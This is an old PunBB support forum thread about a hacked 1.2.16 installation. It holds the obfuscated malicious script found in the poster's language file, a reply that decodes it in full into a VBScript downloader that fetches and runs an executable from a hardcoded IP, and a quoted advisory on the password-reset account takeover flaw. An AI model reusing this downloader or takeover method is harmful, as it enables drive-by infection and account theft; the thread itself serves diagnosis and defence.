1.2.16 hacked...

fmimoso · 2008-06-07 01:50

fmimoso
Member
Offline

Registered: 2006-12-16
Posts: 66

Topic: 1.2.16 hacked...

I have 1.2.16 installed.

My lang/language/index.html file is infected with something like this:

<Script Language='Javascript'>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%0D%0A%20%20%20%20%6F%6E%20%65%72%72%6F%72%20%72%65%73%75%6D%65%20%6E%65%78%74%0D%0A%0D%0A%20%20%20%20%6D%6D%6D%6D%64%66%20%3D%20%22%68%74%74%70%3A%2F%2F%32%30%30%2E%31%38%39%2E%31%37%39%2E%36%30%2F%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%0D%0A%20%20%20%20%7A%30%3D%22%6F%62%6A%22%0D%0A%20%20%20%20%7A%31%3D%22%65%63%74%22%0D%0A%20%20%20%20%7A%73%74%72%3D%7A%30%26%7A%31%0D%0A%0D%0A%20%20%20%20%73%30%3D%22%63%6C%61%73%22%0D%0A%20%20%20%20%73%31%3D%22%73%69%64%22%0D%0A%20%20%20%20%73%73%74%72%3D%73%30%2B%73%31%0D%0A%0D%0A%20%20%20%20%72%30%3D%22%4D%69%63%72%6F%22%0D%0A%20%20%20%20%72%31%3D%22%73%6F%66%74%2E%22%0D%0A%20%20%20%20%72%32%3D%22%58%4D%4C%22%0D%0A%20%20%20%20%72%33%3D%22%48%54%54%50%22%0D%0A%20%20%20%20%72%72%73%74%72%3D%72%30%26%72%31%26%72%32%26%72%33%0D%0A%0D%0A%20%20%20%20%74%30%3D%22%63%6C%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%22%0D%0A%20%20%20%20%74%31%3D%22%31%31%44%30%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%22%0D%0A%20%20%20%20%74%73%73%74%72%3D%74%30%26%74%31%0D%0A%0D%0A%20%20%20%20%53%65%74%20%73%64%64%64%77%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%7A%73%74%72%29%0D%0A%20%20%20%20%73%64%64%64%77%2E%73%65%74%41%74%74%72%69%62%75%74%65%20%73%73%74%72%2C%20%74%73%73%74%72%0D%0A%20%20%20%20%73%74%72%3D%72%72%73%74%72%0D%0A%20%20%20%20%53%65%74%20%65%64%64%20%3D%20%73%64%64%64%77%2E%43%72%65%61%74%65%4F%62%6A%65%63%74%28%73%74%72%2C%22%22%29%0D%0A%0D%0A%20%20%20%20%62%61%31%3D%22%41%64%6F%22%0D%0A%20%20%20%20%62%61%32%3D%22%64%62%2E%22%0D%0A%20%20%20%20%62%61%33%3D%22%53%74%72%22%0D%0A%20%20%20%20%62%61%34%3D%22%65%61%6D%22%0D%0A%20%20%20%20%73%74%72%33%33%3D%62%61%31%26%62%61%32%26%62%61%33%26%62%61%34%0D%0A%20%20%20%20%73%74%72%61%61%3D%73%74%72%33%33%0D%0A%20%20%20%20%73%65%74%20%63%63%63%63%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%73%74%72%61%61%2C%22%22%29%0D%0A%20%20%20%20%63%63%63%63%2E%74%79%70%65%20%3D%20%31%0D%0A%0D%0A%20%20%20%20%73%74%72%36%3D%22%47%45%54%22%0D%0A%20%20%20%20%65%64%64%2E%4F%70%65%6E%20%73%74%72%36%2C%20%6D%6D%6D%6D%64%66%2C%20%46%61%6C%73%65%0D%0A%20%20%20%20%65%64%64%2E%53%65%6E%64%0D%0A%0D%0A%20%20%20%20%66%72%30%3D%22%53%63%72%69%70%74%69%22%0D%0A%20%20%20%20%66%72%31%3D%22%6E%67%2E%46%69%6C%65%53%79%22%0D%0A%20%20%20%20%66%72%32%3D%22%73%74%65%6D%4F%62%6A%65%63%74%22%0D%0A%20%20%20%20%66%72%73%74%72%3D%66%72%30%26%66%72%31%26%66%72%32%0D%0A%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%22%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%20%20%20%20%73%65%74%20%76%76%76%76%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%66%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%73%65%74%20%74%6D%70%20%3D%20%76%76%76%76%2E%47%65%74%53%70%65%63%69%61%6C%46%6F%6C%64%65%72%28%32%29%20%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%20%76%76%76%76%2E%42%75%69%6C%64%50%61%74%68%28%74%6D%70%2C%65%65%65%65%64%66%66%29%0D%0A%20%20%20%20%63%63%63%63%2E%6F%70%65%6E%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%77%72%69%74%65%20%65%64%64%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%73%61%76%65%74%6F%66%69%6C%65%20%65%65%65%65%64%66%66%2C%32%0D%0A%0D%0A%20%20%20%20%67%74%67%30%3D%22%53%68%65%6C%6C%2E%41%70%22%0D%0A%20%20%20%20%67%74%67%31%3D%22%70%6C%69%63%61%74%69%6F%6E%22%0D%0A%20%20%20%20%67%74%72%72%73%74%72%3D%67%74%67%30%26%67%74%67%31%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%63%6C%6F%73%65%0D%0A%20%20%20%20%73%65%74%20%78%78%73%64%64%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%67%74%72%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%78%78%73%64%64%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%20%65%65%65%65%64%66%66%2C%22%22%2C%22%22%2C%22%6F%70%65%6E%22%2C%30%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
</Script>

I know I should've upgraded to a new version, but, considering the harm done, my question is: is this flaw already corrected in the new versions?

If so, what harm could/did this code do?

Thanks.

izzy · 2008-06-07 02:55

izzy
New Member
Offline

Registered: 2008-06-07
Posts: 1

Re: 1.2.16 hacked...

Its a virus.

The code evaluates to:

<scr(disabled)ipt language="VBScript">

on error resume next

mmmmdf = "http://200.189.179.60/IExplorer.exe"

z0="obj"
z1="ect"
zstr=z0&z1

s0="clas"
s1="sid"
sstr=s0+s1

r0="Micro"
r1="soft."
r2="XML"
r3="HTTP"
rrstr=r0&r1&r2&r3

t0="clsid:BD96C556-65A3-"
t1="11D0-983A-00C04FC29E36"
tsstr=t0&t1

Set sdddw = document.createElement(zstr)
sdddw.setAttribute sstr, tsstr
str=rrstr
Set edd = sdddw.CreateObject(str,"")

ba1="Ado"
ba2="db."
ba3="Str"
ba4="eam"
str33=ba1&ba2&ba3&ba4
straa=str33
set cccc = sdddw.createobject(straa,"")
cccc.type = 1

str6="GET"
edd.Open str6, mmmmdf, False
edd.Send

fr0="Scripti"
fr1="ng.FileSy"
fr2="stemObject"
frstr=fr0&fr1&fr2

eeeedff="IExplorer.exe"
set vvvv = sdddw.createobject(frstr,"")
set tmp = vvvv.GetSpecialFolder(2)
eeeedff= vvvv.BuildPath(tmp,eeeedff)
cccc.open

cccc.write edd.responseBody

cccc.savetofile eeeedff,2

gtg0="Shell.Ap"
gtg1="plication"
gtrrstr=gtg0&gtg1

cccc.close
set xxsdd = sdddw.createobject(gtrrstr,"")
xxsdd.ShellExecute eeeedff,"","","open",0

</script>

which seems to download a virus of some sort and try to run it on your computer. It would only affect IE AFAIK, no one in their right mind would have IE's security settings on "ultra-low".

fmimoso · 2008-06-11 11:14

fmimoso
Member
Offline

Registered: 2006-12-16
Posts: 66

Re: 1.2.16 hacked...

Thanks for your reply.

Risking abusing your goodwill, do you know how it got there?

ceryt56 · 2008-06-11 23:39

ceryt56
Junior Member
Offline

Registered: 2008-06-08
Posts: 4

Re: 1.2.16 hacked...

seems the question is solved. did it work??

fmimoso · 2008-06-12 08:38

fmimoso
Member
Offline

Registered: 2006-12-16
Posts: 66

Re: 1.2.16 hacked...

I've updated to the last version and I think it's solved.

HOLLYWOOD · 2008-06-12 09:24

HOLLYWOOD
Member
Offline

Registered: 2008-05-04
Posts: 37

Re: 1.2.16 hacked...

There is a large hole in PunBB 1.2.16 in the forgotten password script.

Application: PunBB <= 1.2.16
Severity: Weak random numbers lead to a blind password recovery vulnerability that allows account takeover
Risk: High
Vendor Status: Vendor has released PunBB 1.2.17 which fixes this issue. (Make sure you update ASAP if you haven't yet...)

Overview:
Quote from http://punbb.org/
"PunBB is a fast and lightweight PHP-powered discussion board.
It is released under the GNU General Public License. Its primary
goals are to be faster, smaller and less graphically intensive as
compared to other discussion boards. PunBB has fewer features
than many other discussion boards, but is generally faster and
outputs smaller, semantically correct XHTML-compliant pages."
PunBB comes with a password reset feature that allows resetting a
forgotten password. When a password reset is requested an email
is sent to the user containing a new random password and an
activation link that needs to be visited in order for the password
change to become effective.

Unfortunately it is possible due to several weak random numbers
to determine the new random password and the activation link
from the outside. This allows taking over any account on the
forum including the administrator account.

Details:
PunBB's password reset functionality uses internally mt_rand() to
generate a new password and a new activation link that are both
send to the user by email.

Unfortunately PunBB initialises the mersenne twister random number
generator on every request with a number between 0 and 1.000.000,
depending on the current microsecond. This means there are only
one million possible new passwords and new activation links. It
would be possible to bruteforce this limited area, but the amount
of time and traffic that would be required is huge.

Because of this a better one shot solution was developed that
allows to determine the new password and the new activation link
from the result of the request that triggered the password reset.

To understand how this is possible it is necessary to know that
during the installation PunBB creates a "random" cookie seed that
is used to store login data in the cookie during a visit. This
cookie seed generation is not really random, because it is more
or less the MD5 hash of the current timestamp. This means it is
easily bruteforceable when the attacker has his own user account
at the forum. He just needs to use his own login cookie and then
check all seconds backwards from the date the admin account was
created (see in memberlist).
The second component required for the attack to work is PunBB's
habit to return a cookie with a randomly generated password, when
it receives a wrong login cookie. Because the cookie seed is known
it can be used to check which one of the one million possible
passwords was generated. By knowing the password we know the
seed used in the call to mt_srand() which lets us predict all
random numbers during the request.

It should be obvious that using this attack on the request that
triggers the password reset allows to blindly determine the new
password and the new activation link in a few seconds. Both can
then be used to takeover the attacked account.

Proof of Concept:
SektionEins GmbH is not going to release a proof of concept
exploit for this vulnerability.

Disclosure Timeline:
15. February 2008 - Notified security@punbb.org
19. February 2008 - PunBB developers released PunBB 1.2.17
20. February 2008 - Public Disclosure

Recommendation:
It is strongly recommended to upgrade to the latest version of
PunBB which also fixes additional vulnerabilities reported by
third parties.

Grab your copy at:

http://punbb.org/downloads.php

It's likely the way that the hacker achieved Admin access to the forum.

[img]http://img229.imageshack.us/img229/7513/vistakq6.gif[/img]

Reines · 2008-06-12 11:30

Reines
Senior Member
Offline

Registered: 2004-10-07
Posts: 304

Re: 1.2.16 hacked...

HOLLYWOOD wrote:

It's likely the way that the hacker achieved Admin access to the forum.

You would need more than admin access to the forum, to edit the lang/language/index.html file.

Synvester · 2008-06-12 11:57

Synvester
Junior Member
Offline

Registered: 2008-06-12
Posts: 4

Re: 1.2.16 hacked...

Reines wrote:

HOLLYWOOD wrote:
It's likely the way that the hacker achieved Admin access to the forum.
You would need more than admin access to the forum, to edit the lang/language/index.html file.

FTP access.

Anatoly · 2008-06-16 07:03

Anatoly
PunBB Developer
Offline

From: Russia
Registered: 2007-12-13
Posts: 642

Re: 1.2.16 hacked...

Your computer is possibly infected by a password stealing Trojan.
Here is the story of such an infection.

Carpe diem

1.2.16 hacked...

Posts: 9

1 Topic by fmimoso 2008-06-07 01:50

Topic: 1.2.16 hacked...

2 Reply by izzy 2008-06-07 02:55

Re: 1.2.16 hacked...

3 Reply by fmimoso 2008-06-11 11:14 (edited by fmimoso 2008-06-11 11:15)

Re: 1.2.16 hacked...

4 Reply by ceryt56 2008-06-11 23:39

Re: 1.2.16 hacked...

5 Reply by fmimoso 2008-06-12 08:38

Re: 1.2.16 hacked...

6 Reply by HOLLYWOOD 2008-06-12 09:24 (edited by HOLLYWOOD 2008-06-12 09:25)

Re: 1.2.16 hacked...

7 Reply by Reines 2008-06-12 11:30

Re: 1.2.16 hacked...

8 Reply by Synvester 2008-06-12 11:57

Re: 1.2.16 hacked...

9 Reply by Anatoly 2008-06-16 07:03

Re: 1.2.16 hacked...

Posts: 9